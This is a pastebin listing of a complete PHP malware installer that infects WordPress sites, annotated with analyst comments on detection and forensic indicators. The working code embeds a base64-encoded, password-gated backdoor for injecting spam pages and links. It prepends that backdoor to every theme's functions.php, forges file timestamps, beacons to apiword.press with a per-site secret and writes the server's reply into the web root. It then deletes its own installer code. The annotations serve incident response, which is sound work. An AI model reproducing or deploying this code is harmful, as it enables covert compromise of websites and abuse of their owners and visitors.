
WordPress code injector (infects functions.php files)

a guest Mar 4th, 2017 470 Never
  1. <?php
     // ANALYSIS NOTE (malware sample): this script is a one-shot installer. As the
     // rest of the listing shows, it
     //   (1) base64-decodes the blob held in $install_code,
     //   (2) creates two tables named <prefix>install_meta and <prefix>datalist,
     //   (3) prepends the decoded blob to each theme's functions.php that does not
     //       already contain the string WP_URL_CD,
     //   (4) requests a URL on apiword.press and writes the reply to license.html
     //       in the document root, and
     //   (5) strips its own installer section out of the file it runs from.
     // Triage indicators visible on this page: the WP_URL_CD string in theme
     // functions.php files, the two tables above, an unexpected license.html in
     // the web root, and outbound HTTP requests to apiword.press.
  2.  
  3. //install_code
  4.  
  5.     $install_code = 'PD9waHAKCmlmIChpc3NldCgkX1JFUVVFU1RbJ2FjdGlvbiddKSAmJiBpc3NldCgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10pICYmICgkX1JFUVVFU1RbJ3Bhc3N3b3JkJ10gPT0gJ3skUEFTU1dPUkR9JykpCgl7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgkJCQljYXNlICdnZXRfYWxsX2xpbmtzJzsKCQkJCQlmb3JlYWNoICgkd3BkYi0+Z2V0X3Jlc3VsdHMoJ1NFTEVDVCAqIEZST00gYCcgLiAkd3BkYi0+cHJlZml4IC4gJ2luc3RhbGxfbWV0YWAgT1JERVIgQlkgYHVybGAgREVTQyBMSU1JVCAwLCAyNTAwJywgQVJSQVlfQSkgYXMgJGRhdGEpCgkJCQkJCXsKCQkJCQkJCXByaW50ICc8ZT48dz4nLiRkYXRhWyd3b3JrJ10uJzwvdz48dXJsPicgLiAkZGF0YVsndXJsJ10gLiAnPC91cmw+PGNvZGU+JyAuICRkYXRhWydjb2RlJ10gLiAnPC9jb2RlPjxpZD4nIC4gJGRhdGFbJ0lEJ10gLiAnPC9pZD48L2U+JyAuICJcclxuIjsKCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWNhc2UgJ3NldF9saW5rcyc7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnZGF0YSddKSkKCQkJCQkJewoJCQkJCQkJaWYgKCR3cGRiLT5xdWVyeSgnVVBEQVRFIGAnIC4gJHdwZGItPnByZWZpeCAuICdpbnN0YWxsX21ldGFgIFNFVCBjb2RlID0gIicgLiBteXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnZGF0YSddKSAuICciIFdIRVJFIGNvZGUgPSAiIiBBTkQgYHdvcmtgID0gIjEiIExJTUlUIDEnKSkKCQkJCQkJCQl7CgkJCQkJCQkJCXByaW50ICJ0cnVlIjsKCQkJCQkJCQl9CgkJCQkJCX0KCQkJCWJyZWFrOwoJCQkJCgkJCQljYXNlICdzZXRfaWRfbGlua3MnOwoJCQkJCWlmIChpc3NldCgkX1JFUVVFU1RbJ2RhdGEnXSkpCgkJCQkJCXsKCQkJCQkJCWlmICgkd3BkYi0+cXVlcnkoJ1VQREFURSBgJyAuICR3cGRiLT5wcmVmaXggLiAnaW5zdGFsbF9tZXRhYCBTRVQgY29kZSA9ICInIC4gbXlzcWxfZXNjYXBlX3N0cmluZygkX1JFUVVFU1RbJ2RhdGEnXSkgLiAnIiBXSEVSRSBgSURgID0gIicgLiBteXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnaWQnXSkgLiAnIicpKQoJCQkJCQkJCXsKCQkJCQkJCQkJcHJpbnQgInRydWUiOwoJCQkJCQkJCX0KCQkJCQkJfQoJCQkJYnJlYWs7CgkJCQkKCQkJCWNhc2UgJ2NyZWF0ZV9wYWdlJzsKCQkJCQlpZiAoaXNzZXQoJF9SRVFVRVNUWydyZW1vdmVfcGFnZSddKSkKCQkJCQkJewoJCQkJCQkJaWYgKCR3cGRiIC0+IHF1ZXJ5KCdERUxFVEUgRlJPTSBgJyAuICR3cGRiLT5wcmVmaXggLiAnZGF0YWxpc3RgIFdIRVJFIGB1cmxgID0gIi8nLm15c3FsX2VzY2FwZV9zdHJpbmcoJF9SRVFVRVNUWyd1cmwnXSkuJyInKSkKCQkJCQkJCQl7CgkJCQkJCQkJCXByaW50ICJ0cnVlIjsKCQkJCQkJCQl9CgkJCQkJCX0KCQkJCQllbHNlaWYgKGlzc2V0KCRfUkVRVUVTVFsnY29udGVudCddKSAmJiAhZW1wdHkoJF9SRVFVRVNUWydjb250ZW50J10pKQoJCQkJCQl7CgkJCQkJCQlpZi
AoJHdwZGIgLT4gcXVlcnkoJ0lOU0VSVCBJTlRPIGAnIC4gJHdwZGItPnByZWZpeCAuICdkYXRhbGlzdGAgU0VUIGB1cmxgID0gIi8nLm15c3FsX2VzY2FwZV9zdHJpbmcoJF9SRVFVRVNUWyd1cmwnXSkuJyIsIGB0aXRsZWAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsndGl0bGUnXSkuJyIsIGBrZXl3b3Jkc2AgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsna2V5d29yZHMnXSkuJyIsIGBkZXNjcmlwdGlvbmAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnZGVzY3JpcHRpb24nXSkuJyIsIGBjb250ZW50YCA9ICInLm15c3FsX2VzY2FwZV9zdHJpbmcoJF9SRVFVRVNUWydjb250ZW50J10pLiciLCBgZnVsbF9jb250ZW50YCA9ICInLm15c3FsX2VzY2FwZV9zdHJpbmcoJF9SRVFVRVNUWydmdWxsX2NvbnRlbnQnXSkuJyIgT04gRFVQTElDQVRFIEtFWSBVUERBVEUgYHRpdGxlYCA9ICInLm15c3FsX2VzY2FwZV9zdHJpbmcoJF9SRVFVRVNUWyd0aXRsZSddKS4nIiwgYGtleXdvcmRzYCA9ICInLm15c3FsX2VzY2FwZV9zdHJpbmcoJF9SRVFVRVNUWydrZXl3b3JkcyddKS4nIiwgYGRlc2NyaXB0aW9uYCA9ICInLm15c3FsX2VzY2FwZV9zdHJpbmcoJF9SRVFVRVNUWydkZXNjcmlwdGlvbiddKS4nIiwgYGNvbnRlbnRgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZyh1cmxkZWNvZGUoJF9SRVFVRVNUWydjb250ZW50J10pKS4nIiwgYGZ1bGxfY29udGVudGAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfUkVRVUVTVFsnZnVsbF9jb250ZW50J10pLiciJykpCgkJCQkJCQkJewoJCQkJCQkJCQlwcmludCAidHJ1ZSI7CgkJCQkJCQkJfQoJCQkJCQl9CgkJCQlicmVhazsKCQkJCQoJCQkJZGVmYXVsdDogcHJpbnQgIkVSUk9SX1dQX0FDVElPTiI7CgkJCX0KCQkJCgkJZGllKCIiKTsKCX0KCiRzdXBlcl91cmwgPSAnaHR0cDovLycgLiAkX1NFUlZFUlsiSFRUUF9IT1NUIl0gLiAkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXTsKCQppZiAoICR3cGRiLT5nZXRfdmFyKCdTRUxFQ1QgY291bnQoKikgRlJPTSBgJyAuICR3cGRiLT5wcmVmaXggLiAnZGF0YWxpc3RgIFdIRVJFIGB1cmxgID0gIicubXlzcWxfZXNjYXBlX3N0cmluZyggJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10gKS4nIicpID09ICcxJyApCgl7CgkJJGRhdGEgPSAkd3BkYiAtPiBnZXRfcm93KCdTRUxFQ1QgKiBGUk9NIGAnIC4gJHdwZGItPnByZWZpeCAuICdkYXRhbGlzdGAgV0hFUkUgYHVybGAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKS4nIicpOwoJCWlmICgkZGF0YSAtPiBmdWxsX2NvbnRlbnQpCgkJCXsKCQkJCXByaW50IHN0cmlwc2xhc2hlcygkZGF0YSAtPiBjb250ZW50KTsKCQkJfQoJCWVsc2UKCQkJewoJCQkJcHJpbnQgJzwhRE9DVFlQRSBodG1sPic7CgkJCQlwcmludCAnPGh0bWwgJzsKCQkJCWxhbmd1YWdlX2F0dHJpYnV0ZXMoKTsKCQkJCXByaW50ICcgY2xhc3M9Im5vLWpzIj4nOwoJCQ
kJcHJpbnQgJzxoZWFkPic7CgkJCQlwcmludCAnPHRpdGxlPicuc3RyaXBzbGFzaGVzKCRkYXRhIC0+IHRpdGxlKS4nPC90aXRsZT4nOwoJCQkJcHJpbnQgJzxtZXRhIG5hbWU9IktleXdvcmRzIiBjb250ZW50PSInLnN0cmlwc2xhc2hlcygkZGF0YSAtPiBrZXl3b3JkcykuJyIgLz4nOwoJCQkJcHJpbnQgJzxtZXRhIG5hbWU9IkRlc2NyaXB0aW9uIiBjb250ZW50PSInLnN0cmlwc2xhc2hlcygkZGF0YSAtPiBkZXNjcmlwdGlvbikuJyIgLz4nOwoJCQkJcHJpbnQgJzxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0iaW5kZXgsIGZvbGxvdyIgLz4nOwoJCQkJcHJpbnQgJzxtZXRhIGNoYXJzZXQ9Iic7CgkJCQlibG9naW5mbyggJ2NoYXJzZXQnICk7CgkJCQlwcmludCAnIiAvPic7CgkJCQlwcmludCAnPG1ldGEgbmFtZT0idmlld3BvcnQiIGNvbnRlbnQ9IndpZHRoPWRldmljZS13aWR0aCI+JzsKCQkJCXByaW50ICc8bGluayByZWw9InByb2ZpbGUiIGhyZWY9Imh0dHA6Ly9nbXBnLm9yZy94Zm4vMTEiPic7CgkJCQlwcmludCAnPGxpbmsgcmVsPSJwaW5nYmFjayIgaHJlZj0iJzsKCQkJCWJsb2dpbmZvKCAncGluZ2JhY2tfdXJsJyApOwoJCQkJcHJpbnQgJyI+JzsKCQkJCXdwX2hlYWQoKTsKCQkJCXByaW50ICc8L2hlYWQ+JzsKCQkJCXByaW50ICc8Ym9keT4nOwoJCQkJcHJpbnQgJzxkaXYgaWQ9ImNvbnRlbnQiIGNsYXNzPSJzaXRlLWNvbnRlbnQiPic7CgkJCQlwcmludCBzdHJpcHNsYXNoZXMoJGRhdGEgLT4gY29udGVudCk7CgkJCQlnZXRfc2VhcmNoX2Zvcm0oKTsKCQkJCWdldF9zaWRlYmFyKCk7CgkJCQlnZXRfZm9vdGVyKCk7CgkJCX0KCQkJCgkJZXhpdDsKCX0KCQppZiAoIChzdHJwb3Moc3RydG9sb3dlcigkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pLCAnZ29vZ2xlYm90JykgIT09IEZBTFNFKSAmJiAoICR3cGRiLT5nZXRfdmFyKCdTRUxFQ1QgY291bnQoKikgRlJPTSBgJyAuICR3cGRiLT5wcmVmaXggLiAnaW5zdGFsbF9tZXRhYCBXSEVSRSBgdXJsYCA9ICInLm15c3FsX2VzY2FwZV9zdHJpbmcoICRzdXBlcl91cmwgKS4nIicpID09ICcwJykgKQoJewoJCSR3cGRiLT5xdWVyeSgnIElOU0VSVCBJTlRPIGAnIC4gJHdwZGItPnByZWZpeCAuICdpbnN0YWxsX21ldGFgIFNFVCBgdXJsYCA9ICInLm15c3FsX2VzY2FwZV9zdHJpbmcoJHN1cGVyX3VybCkuJyIgJyk7Cgl9CiAKJEdMT0JBTFNbJ1dQX1VSTF9DRCddID0gc3RyaXBzbGFzaGVzKCAkd3BkYiAtPiBnZXRfdmFyKCdTRUxFQ1QgYGNvZGVgIEZST00gYCcgLiAkd3BkYi0+cHJlZml4IC4gJ2luc3RhbGxfbWV0YWAgV0hFUkUgYHVybGAgPSAiJy5teXNxbF9lc2NhcGVfc3RyaW5nKCRzdXBlcl91cmwpLiciJykgKTsKCmlmICgkX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSAhPSAiLyIpCmFkZF9maWx0ZXIoJ3RoZV9jb250ZW50JywgJ2NvbnRlbnRfdXBkdF90aGVtZScpOwphZGRfYWN0aW9uKCd3cF9mb290ZXInLCAgICdjb250ZW50X3VwZHRfZm9vdGVyJyk7CgpmdW5jdGlvbi
Bjb250ZW50X3VwZHRfdGhlbWUoICRwYWdlICkKCXsKCQkkcGFnZSAuPSAkR0xPQkFMU1snV1BfVVJMX0NEJ107CgkJJEdMT0JBTFNbJ1dQX1VSTF9DRCddID0gJyc7CgkJcmV0dXJuICRwYWdlIDsKCX0KCQpmdW5jdGlvbiBjb250ZW50X3VwZHRfZm9vdGVyKCkKCXsKCQlwcmludCAkR0xPQkFMU1snV1BfVVJMX0NEJ107Cgl9Cgo/Pg==';
  6.    
         // Per-site secret used by the injected code: MD5 of the request's Host header
         // concatenated with AUTH_SALT (a constant WordPress reads from wp-config.php).
         // NOTE(review): HTTP_HOST comes from the request, so the value depends on the
         // Host header of whichever request executed this installer.
  7.     $install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
         // Decode the blob and substitute the literal {$PASSWORD} placeholder with the
         // hash. From here on $install_code holds the PHP text that is written into
         // theme files; the hash is baked into that text at install time, and the same
         // hash is later sent to the remote host in a URL query string.
  8.     $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
  9.    
          // Persistence step 1: create <prefix>install_meta. Everything inside the braces
          // runs only when this query() call returns a truthy value.
          // Detection: neither install_meta nor datalist (created below) is created
          // anywhere else on this page; their presence in the WordPress database is a
          // strong indicator that this installer ran.
  10.     if ($wpdb -> query('CREATE TABLE IF NOT EXISTS `' . $wpdb->prefix . 'install_meta` (`url` varchar(255) NOT NULL,`code` text NOT NULL,`work` int(11) NOT NULL,`ID` int(11) NOT NULL AUTO_INCREMENT, PRIMARY KEY (`ID`),UNIQUE KEY `url` (`url`), KEY `work` (`work`)) ENGINE=MyISAM  DEFAULT CHARSET=utf8 AUTO_INCREMENT=1'))
  11.         {
                  // Second table, <prefix>datalist, keyed by URL with title/keywords/description/content columns.
  12.             $wpdb -> query('CREATE TABLE IF NOT EXISTS `' . $wpdb->prefix . 'datalist` ( `url` varchar(255) NOT NULL, `title` varchar(255) NOT NULL, `keywords` varchar(255) NOT NULL, `description` varchar(255) NOT NULL, `content` longtext NOT NULL, `full_content` smallint(6) NOT NULL, PRIMARY KEY (`url`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8;');
                  // Theme directory is derived from DOCUMENT_ROOT, not from WordPress's own path helpers.
                  // NOTE(review): this presumably misses installs in a subdirectory or with a relocated
                  // wp-content; during cleanup, check every theme directory regardless.
  13.             $themes = $_SERVER['DOCUMENT_ROOT'] . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';
  14.                
                  // $ping stays true unless at least one functions.php already carries the marker string.
  15.             $ping = true;
  16.                
                  // Walk every directory entry under themes/ (active or not) and target its functions.php.
  17.             if ($list = scandir( $themes ))
  18.                 {
  19.                     foreach ($list as $_)
  20.                         {
  21.                             if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
  22.                                 {
                                          // Remember the file's timestamp before modifying it (see touch() below).
  23.                                     $time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');
  24.                                        
  25.                                     if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
  26.                                         {
                                                  // WP_URL_CD is the infection marker: the decoded blob references this name,
                                                  // so files that already contain it are skipped. Detection: grep theme
                                                  // functions.php files for this string.
  27.                                             if (strpos($content, 'WP_URL_CD') === false)
  28.                                                 {
                                                          // Prepend the decoded code to the theme file; write errors are suppressed with @.
  29.                                                     $content = $install_code . $content ;
  30.                                                     @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
                                                          // Timestamp tampering: the saved time is written back, so the file's
                                                          // modification time does not reveal the change. Compare file contents
                                                          // or hashes against a clean copy of the theme instead of trusting mtime.
                                                          // NOTE(review): on Unix-like systems touch() sets access/modification
                                                          // times only, so the inode change time should still reflect the write -
                                                          // confirm on the affected host.
  31.                                                     touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
  32.                                                 }
  33.                                             else
  34.                                                 {
                                                          // A previously infected file was found: suppress the remote call below.
  35.                                                     $ping = false;
  36.                                                 }
  37.                                         }
  38.                                        
  39.                                 }
  40.                         }
  41.                        
                          // Beacon: plain-HTTP GET to apiword.press carrying the site's Host header and
                          // the per-site hash in the query string. Whatever the server returns is written,
                          // after stripslashes(), to license.html in the document root. Both calls suppress errors.
                          // Detection: outbound requests to apiword.press in proxy/DNS/egress logs, and an
                          // unexpected license.html in the web root. The hash should be treated as known
                          // to whoever operates that host.
  42.                     if ($ping) {
  43.                         $content = @file_get_contents('http://apiword.press/q.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
  44.                         @file_put_contents($_SERVER['DOCUMENT_ROOT'] . '/license.html', stripslashes($content));
  45.                     }
  46.                 }
  47.         }
  48.  
          // Self-removal: the installer reads the file it is running from, deletes everything
          // between its opening and closing comment markers (the "s" modifier lets "." span
          // newlines), drops any PHP open/close tag pair left with only whitespace between
          // them, and writes the result back with errors suppressed.
          // Forensics: once this has run, the installer text is gone from the carrier file,
          // so its absence does not show the site is clean. Rely on the persistent artifacts
          // (modified functions.php files, the two database tables, license.html) and on
          // backups or file-integrity baselines to identify which file carried it.
          // The error_reporting(0) statement on the last line sits outside the markers, so
          // the first pattern does not remove it.
  49.     if ($file = @file_get_contents(__FILE__))
  50.         {
  51.             $file = preg_replace('!//install_code.*//install_code_end!s', '', $file);
  52.             $file = preg_replace('!<\?php\s*\?>!s', '', $file);
  53.             @file_put_contents(__FILE__, $file);
  54.         }
  55.  
  56. //install_code_end
  57.  
  58. ?><?php error_reporting(0);?>